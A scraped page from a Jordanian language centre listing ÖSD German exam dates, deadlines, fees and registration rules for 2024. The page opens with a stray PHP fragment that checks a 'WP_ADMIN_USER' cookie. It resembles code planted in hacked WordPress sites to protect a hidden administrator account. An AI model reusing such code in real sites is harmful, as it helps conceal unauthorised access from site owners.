if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } German Language Exams | Lgcjo

German Language Exams

The ÖSD is a state-approved examination and assessment system for German as a Foreign Language. ÖSD exams correspond to the levels of the “Common European Framework of Reference for Languages” (CEFR) and “Profile deutsch”.

LGC is an official German language examination center since 2015. ÖSD German language exams are recognized in Austria, Germany and Switzerland as well as worldwide e.g. for studying or applying for a job.

The registration is open for all announced exam days and the procedure should be finished 4 weeks before the exam. In case of cancellation before the deadline to register the exam fee is refunded less an administrative fee of 15 JD. In case of cancellation after that, no refunds can be issued.

Register online here for 2024.

Summary: You will need a signed form, electronic passport photo and a copy of your passport (name written in English). For the exam day you will need only your passport (name in English) or your Jordanian ID.

Filled form is valid for 2 days only in order to complete it with the payment but also no longer valid after the deadline of registration. After receiving the exam fees, a payment confirmation with your seat number will be sent to you via email.

The dates for the German A1, A2, B1, B2 and C1 exams in 2024. The exam days may vary +/- up to two to three days. Oral exams might be within a week after the written exam or couple of days before the exam date. The exact exams days/hours will be sent to you approx. one week before the announced exam date.

Seats are limited! Changes are reserved.

Exam Date

(Changes are reserved)

Last Day to Register

or/and drop 4pm!
Dates on this page are the updated ones!(Seats are limited)
03.01.-07.01.2024 (A1-C1)05.12.2023
31.01.-04.02.2024 (A1-B2)02.01.2024
28.02.-03.03.2024 (A1-B2)30.01.2024
02.04.-06.04.2024 (A1-B2)29.02.2024
08.05.-12.05.2024 (A1-B2)08.04.2024
29.05.-02.06.2024 (A1-B2)30.04.2024
20.06.-24.06.2024 (A1-B2)22.05.2024
10.07.-14.07.2024 (A1-C1)11.06.2024
01.08.-05.08.2024 (A1-B2)03.07.2024
21.08.-25.08.2024 (A1-B2)23.07.2024
04.09.-08.09.2024 (A1-B2)06.08.2024
02.10.-06.10.2024 (A1-B2)03.09.2024
30.10.-03.11.2024 (A1-B2)01.10.2024
27.11.-01.12.2024 (A1-B2)29.10.2024
18.12.-22.12.2024 (A1-B2)19.11.2024

The fees for the exams in 2024:

A1: 100 JD intern and 120 JD extern

A2: 105 JD intern and 130 JD extern

B1 partial (modules intern/extern):

1 module 60 JD, 2 modules 85 JD, 3 modules 115 JD, 4 modules 145 JD

B2 120 JD intern and 170 JD extern

C1: 125 JD intern and 175 JD extern

More about ÖSD: German Language Authorized Examinations

Additional information:

If failed and you wish to see your exam results, please write a request to info@lgcjo.com. This is only possible up to three days after the exam’s results. The results will be published around a week after the exam (please always read the invoice carefully), the certificate will be issued approx. after 2-4 weeks after the announcement of the marks. The certificate can only be picked up in person with the own ID or passport. For the fees for repeating the exams please contact the Center. For all information regarding marks and certificates please follow our facebook page and kindly avoid calling or sending messages:


NOTE: No claims (payment receipts, exam fees, etc.) are accepted after the calendar year is finished. Date of booking is crucial.

Last update: November 2023 (valid is always the updated last version)